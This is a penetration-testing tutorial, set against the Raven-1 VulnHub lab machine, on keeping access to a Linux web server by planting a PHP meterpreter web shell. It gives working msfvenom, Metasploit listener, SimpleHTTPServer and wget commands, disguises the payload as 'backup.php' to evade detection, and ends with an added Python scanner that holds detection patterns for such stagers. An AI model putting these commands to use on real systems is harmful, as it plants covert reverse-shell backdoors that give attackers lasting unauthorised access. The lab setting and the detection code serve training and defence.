- Kali Linux OR Parrot OS
- Practical understanding of T*****/IP
- This tutorial was conducted against a Linux virtual machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
https://www.vulnhub.com/entry/raven-1,256/
Goal:
The goal is to maintain access to the Linux target once an initial foothold has been obtained.
PART 2. PERSISTENCE THROUGH WEB SHELL:
This persistence technique involves creating a PHP web shell and uploading it to the target server. Since the server runs the LAMP stack, we can generate a PHP meterpreter payload and place it on the web server as a covert means of entry.
The first step is to generate the PHP meterpreter payload with msfvenom, using the following command:
msfvenom -p php/meterpreter/reverse_t***** LHOST=<KALI-IP> LPORT=<PORT> -e php/base64 -f raw > backup.php
To escape detection, we save the payload under the innocuous filename "backup.php".
Once the payload has been created, the next step is to edit it and add the PHP tags so that the script actually executes, as shown in the accompanying image.
We can now set up the listener in Metasploit with the following commands:
msfconsole
use multi/handler
set payload php/meterpreter/reverse_t*****
set LHOST <KALI-IP>
set LPORT <PORT>
run
The next step is to upload the PHP shell we just created to the web host. This can be done by starting a local web server on the Kali virtual machine and fetching the file from the target. Note that SimpleHTTPServer serves plain HTTP, so the target must request the file over http://, not https://.
sudo python -m SimpleHTTPServer 80
wget http://<KALI-IP>/backup.php
In this case, we place the "backup.php" file in the document root of the web server, under /var/www/html, as shown in the image below.
We can obtain a meterpreter session on the target by browsing to the "backup.php" file on the web server. It can be reached with the following URL in your web browser:
https://<SERVER-IP>/backup.php
Browsing to the file this way executes the PHP code, which then hands you a meterpreter session on your listener, as shown in the image below.
We have thus established persistence by uploading a meterpreter web shell, giving us continued access to the target server without needing to authenticate over SSH.
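From the defender's side, here is an added example (not part of the original post) of how the kind of file this tutorial drops can be spotted: a Python scanner that walks a web document root for recently modified PHP files containing eval(base64_decode(...)) and similar stager indicators. The indicator patterns, the sample files written by demo_scan() and the 24-hour window are constructed assumptions for this example.

```python
import re
import tempfile
import time
from pathlib import Path
from typing import Optional

# Indicators typical of the stager this tutorial uploads (msfvenom -e php/base64):
# an eval() fed by base64_decode(), a long base64 literal, or a raw socket call.
# The patterns are constructed for this example; tune them for your own web root.
INDICATORS = {
    "eval_base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
    "long_b64":    re.compile(rb"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    "socket_call": re.compile(rb"\b(?:fsockopen|stream_socket_client)\s*\(", re.I),
}

def classify(data: bytes) -> list:
    """Return the names of the indicators matched by one file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(data)]

def scan_webroot(root: str, newer_than_hours: Optional[float] = None) -> list:
    """Walk the document root and report PHP files that match any indicator.
    If newer_than_hours is given, only files modified within that window are
    reported, which surfaces a freshly dropped file such as backup.php."""
    cutoff = time.time() - newer_than_hours * 3600 if newer_than_hours else None
    hits = []
    for path in Path(root).rglob("*.php"):
        st = path.stat()
        if cutoff is not None and st.st_mtime < cutoff:
            continue  # old file, outside the window of interest
        matched = classify(path.read_bytes())
        if matched:
            hits.append({"path": str(path), "mtime": st.st_mtime, "indicators": matched})
    return hits

def demo_scan() -> list:
    """Build a constructed web root with one benign page and one stager-like file,
    then scan it. Both files are sample data written for this example."""
    root = tempfile.mkdtemp()
    (Path(root) / "index.php").write_text("<?php echo 'hello'; ?>\n")
    b64 = "A" * 300  # constructed filler standing in for a long base64 literal
    (Path(root) / "backup.php").write_text(
        f'<?php eval(base64_decode("{b64}")); ?>\n')
    return scan_webroot(root, newer_than_hours=24)

if __name__ == "__main__":
    for hit in demo_scan():
        print(hit["path"], hit["indicators"])
```

Run it against a real document root with scan_webroot("/var/www/html", newer_than_hours=24) and feed the hits to whatever alerting you already have; mtime filtering alone is not a control, since an attacker can reset timestamps.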